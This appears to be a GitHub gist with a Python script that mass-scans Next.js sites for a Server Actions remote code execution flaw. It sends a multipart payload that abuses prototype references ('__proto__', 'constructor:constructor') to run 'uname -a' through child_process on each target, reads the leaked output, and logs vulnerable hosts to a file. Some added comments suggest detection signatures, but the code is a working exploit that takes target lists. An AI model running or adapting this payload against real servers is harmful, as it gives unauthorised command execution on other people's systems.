Created
January 14, 2026 00:21
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
| #!/usr/bin/env python3 | |
| import requests | |
| import argparse | |
| from colorama import init, Fore, Style | |
| import re | |
| import sys | |
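# autoreset=True makes colorama reset colour/style after every print, so a
# coloured line cannot bleed into the next one.
init(autoreset=True)

# Command line: -u takes a single URL, -l a file with one target per line.
# When both are given, -l wins (it is tested first below).
parser = argparse.ArgumentParser(description="Send payload & detect vuln")
parser.add_argument("-u", "--url", help="Single target URL")
parser.add_argument("-l", "--list", help="List of targets (one per line)")
args = parser.parse_args()

targets = []
if args.list:
    try:
        with open(args.list, "r") as f:
            # Keep non-blank lines only, stripped of surrounding whitespace.
            raw = [line.strip() for line in f if line.strip()]
    except (OSError, UnicodeDecodeError) as e:
        # Only read/decode failures are handled here. The previous bare
        # `except:` also swallowed Ctrl-C and always claimed "list.txt" was
        # missing, whatever file was named and whatever actually went wrong.
        print(Fore.RED + f"[ERR] Cannot read target list {args.list}: {e}")
        sys.exit(1)
    # dict.fromkeys() drops duplicates while keeping first-seen order.
    targets = list(dict.fromkeys(raw))
    print(Fore.YELLOW + f"[INFO] Unique Target: {len(targets)}" + Style.RESET_ALL)
elif args.url:
    targets = [args.url.strip()]
else:
    print(Fore.RED + "[ERR] Pls Use -u For Single URL OR Use -l For List")
    sys.exit(1)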
# ================
# PAYLOAD
# ================
# Request headers sent with every probe. "Next-Action" is the header Next.js
# uses to mark a POST as a Server Action call. The User-Agent and the two
# request-id values are fixed strings, so every request from this script
# carries the same values -- useful search terms for proxy, WAF or access logs.
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Assetnote/1.0.0",
    "Next-Action": "x",
    "X-Nextjs-Request-Id": "b5dce965",
    "X-Nextjs-Html-Request-Id": "SSTMXm7OJ_g0Ncx6jpQt9"
}
# Multipart form fields "0", "1" and "2". A (None, value) tuple makes requests
# send the value as a plain form part with no filename.
# Field "0" is a JSON document whose values reference "__proto__" and
# "constructor:constructor"; its "_prefix" string is JavaScript that runs
# `uname -a` via child_process.execSync (5 s timeout) and throws an Error named
# NEXT_REDIRECT whose digest is the command output.
# NOTE(review): presumably the digest is what carries the output back in the
# HTTP response, since the scan loop searches the response body for it -- confirm.
# NOTE(review): a Next-Action POST whose multipart body contains "__proto__",
# "constructor:constructor" or "child_process" looks unlike ordinary client
# traffic and is a candidate signature for request logging / WAF rules;
# validate against real application traffic before blocking on it.
files = {
    "0": (None, '''{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\\"then\\":\\"$B1337\\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('uname -a',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}'''),
    "1": (None, '"$@0"'),
    "2": (None, '[]')
}
# Shape of Linux `uname -a` output: the word "Linux", one token (the node
# name), then a dotted kernel version; the rest of the line is captured too.
# Only Linux-style output can match.
pattern = r"(Linux\s+\S+\s+\d+\.\d+\.\S+.*)"
# Results file, written to the current working directory.
save_file = "vuln.txt"
# Truncate the results file so every run starts from an empty file:
open(save_file, "w").close()
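# ================
# SCAN LOOP
# ================
# For each target: send the multipart POST once, search the response body for
# Linux `uname -a` output, and append matches to save_file.
for raw_url in targets:
    url = raw_url
    # Bare host names get https:// prepended. The scheme is matched exactly, so
    # a host name that merely begins with "http" is no longer mistaken for a
    # complete URL (which made requests reject it as scheme-less).
    if not url.lower().startswith(("http://", "https://")):
        url = "https://" + url
    print(Fore.CYAN + f"\n[+] Testing: {url}" + Style.RESET_ALL)
    try:
        # NOTE(review): requests follows redirects by default, and a 307/308
        # re-sends the same POST body to the redirect target. Pass
        # allow_redirects=False if the request must stay on the listed host.
        r = requests.post(url, headers=headers, files=files, timeout=10)
        resp = r.text.strip()
    except Exception as e:
        # Per-target boundary: report the failure and move on to the next one.
        print(Fore.RED + f"[ERR] ERROR: {e}")
        continue
    # Look for a Linux `uname -a` line anywhere in the response body.
    m = re.search(pattern, resp)
    if m:
        # Take the text that matched the pattern.
        sys_info = m.group(1).strip()
        # Cut trailing residue such as a closing quote, JSON terminator, or a
        # literal backslash-n sequence.
        sys_info = sys_info.split('"')[0].split('\\n')[0].strip()
        # The matched text is chosen by the remote server, and the pattern's
        # trailing ".*" accepts control characters. Strip anything
        # non-printable so a response cannot inject terminal escape sequences
        # into the console or into the results file.
        sys_info = "".join(ch for ch in sys_info if ch.isprintable())
        print(Fore.GREEN + f"[VULN] {sys_info}" + Style.RESET_ALL)
        with open(save_file, "a") as f:
            f.write(f"{url} => {sys_info}\n")
    else:
        # No uname-style line in the response, so nothing is saved. This branch
        # covers every non-match (non-Linux output, an error page, a filtered
        # request), so it is not evidence that the host is patched.
        print(Fore.RED + "[NOT VULN / PATTERN MISMATCH]" + Style.RESET_ALL)
print(Fore.YELLOW + f"\n[INFO] Scan Selesai. Hasil disimpan di -> {save_file}" + Style.RESET_ALL)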